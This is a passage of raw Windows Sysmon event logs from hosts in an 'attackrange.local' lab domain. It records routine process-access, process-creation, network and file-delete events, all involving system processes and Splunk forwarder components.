09:04:26.614{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977227Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:26.614{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977226Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:26.614{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977225Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:26.614{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977224Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:26.614{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977223Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:26.614{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-891A-6151-9079-00000000FD01}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977222Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:26.614{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-891A-6151-9079-00000000FD01}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977221Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:26.599{69CF5F33-891A-6151-9079-00000000FD01}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000977220Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:26.536{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1DF264A6CD48F0AB1B1DAEC8377DD5E3,SHA256=E8E9D8E101BC129533940CFBDE740F47767B3B119CA57D02986CDCA27A2AB11A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977219Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:26.130{69CF5F33-8919-6151-8F79-00000000FD01}33242396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000977218Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:22.712{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59293-false10.0.1.12-8000- 10341000x8000000000000000977264Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.989{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-891B-6151-9279-00000000FD01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977263Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.989{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977262Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.989{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977261Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.989{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977260Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.989{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977259Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.989{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977258Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.989{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977257Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.989{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977256Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.989{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977255Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.989{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977254Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.989{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-891B-6151-9279-00000000FD01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977253Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.973{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-891B-6151-9279-00000000FD01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977252Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.974{69CF5F33-891B-6151-9279-00000000FD01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000977251Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.848{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFE511AF5C8F90190A27DEC9282C8443,SHA256=C1144332915BF99CB62C704B9FA873BC6D1B917EB67293E5ED445E37EF760761,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048611Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:25.784{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53250-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048610Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:27.730{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD842E79B9E9C32BDCAD8B91BA6FCE4C,SHA256=F24686D90AB134F6F074DD9E28ED495D35C3C08102763F9E59DF54A7FFAD4934,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977250Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.755{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=359FE101D483687D0D635ADEDA2E7938,SHA256=44FCB4A46F2DB1C2C3927AD9539D3122BD48082A74158E92165B97B70F37B101,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977249Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.301{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-891B-6151-9179-00000000FD01}2548C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977248Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.301{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977247Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 